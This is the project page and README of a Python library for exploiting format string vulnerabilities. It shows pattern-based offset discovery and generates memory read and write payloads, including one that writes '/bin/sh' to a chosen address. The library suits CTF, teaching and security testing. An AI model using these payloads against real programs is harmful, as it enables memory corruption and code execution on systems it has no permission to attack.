Project author: arthaud

Project description:
Format string exploitation helper
Language: Python
Project URL: git://github.com/arthaud/formatstring.git
Created: 2015-11-01T15:07:39Z
Project community: https://github.com/arthaud/formatstring

License: MIT License


Formatstring

Formatstring is a Python 3 library that helps with the exploitation of format string vulnerabilities.

Install

formatstring can be installed from PyPI (Python package index) using pip:

    pip install formatstring

Examples

  • Generate a pattern to detect the offset of the printed buffer

    $ fmtstr_pattern_create 255
    ABCDEFGH|%1$p|%2$p|%3$p|%4$p|%5$p|%6$p|%7$p|%8$p|%9$p|%10$p

  • Compute the offset, given the result of the format string on the previous pattern

    $ fmtstr_pattern_offset --arch x86_32
    Enter the result of the format string on a pattern given by pattern_create:
    ABCDEFGH|0x400|0xf776e5a0|0x4|0x4|0x7|0x1b3220|0x43424120|0x47464544|0x31257c48|0x257c7024
    Found buffer at offset 8

  • Generate a payload to read at a given address

    ```python
    import sys
    from formatstring import *

    # offset is the buffer offset, e.g. as reported by fmtstr_pattern_offset
    settings = PayloadSettings(offset=8, arch=x86_32)

    p = ReadPayload(0x8048590)
    sys.stdout.buffer.write(p.generate(settings))
    ```

  • Generate a payload to write at various addresses

    ```python
    import struct
    import sys
    from formatstring import *

    settings = PayloadSettings(offset=8, arch=x86_32)

    # Map each target address to the bytes to store there
    p = WritePayload()
    p[0x8049790] = b'/bin/sh\x00'
    p[0x80497a8] = struct.pack('@I', 0x01020304)
    sys.stdout.buffer.write(p.generate(settings))
    ```
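
The offset step in the second example can be checked by hand: each `%N$p` field is one stack word, and the buffer is found where those words, laid out little-endian, spell the `ABCDEFGH` marker. The sketch below is an added example, not code from the formatstring project; `find_buffer_offset` and its `(offset, padding)` return value are hypothetical names chosen here, and it assumes a little-endian target.

```python
# Added illustration: decode the output of the pattern shown above.
# Not the library's implementation; little-endian layout is assumed.

# Leak copied from the fmtstr_pattern_offset example on this page.
SAMPLE_LEAK = ("ABCDEFGH|0x400|0xf776e5a0|0x4|0x4|0x7|0x1b3220|"
               "0x43424120|0x47464544|0x31257c48|0x257c7024")


def find_buffer_offset(leak, marker=b"ABCDEFGH", word_size=4):
    """Return (offset, padding) or None if the marker is not on the stack.

    offset  -- 1-based index of the first %N$p slot lying fully inside
               the buffer
    padding -- number of buffer bytes that precede that slot
    """
    fields = leak.strip().split("|")
    stack = b""
    # fields[0] is the echoed marker; the rest are the %1$p, %2$p, ... words.
    for field in fields[1:]:
        # glibc prints a NULL pointer as "(nil)" for %p.
        value = 0 if field == "(nil)" else int(field, 16)
        stack += value.to_bytes(word_size, "little")

    pos = stack.find(marker)
    if pos < 0:
        return None

    slot, byte_in_slot = divmod(pos, word_size)
    if byte_in_slot == 0:
        # Marker is word-aligned: slot N (1-based) is the buffer start.
        return slot + 1, 0
    # Marker starts mid-word: skip to the next slot, which is fully
    # inside the buffer, and report how many bytes were skipped.
    return slot + 2, word_size - byte_in_slot


if __name__ == "__main__":
    # Slot 7 is 0x43424120 (" ABC"), so the marker starts one byte in.
    print(find_buffer_offset(SAMPLE_LEAK))
```

On the page's sample the marker begins one byte into slot 7, so the first slot fully inside the buffer is slot 8, which agrees with the `Found buffer at offset 8` line above.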

Doc

The full documentation is available here.

Contributors

Author: Maxime Arthaud (maxime@arthaud.me)

License

formatstring is under The MIT License (MIT)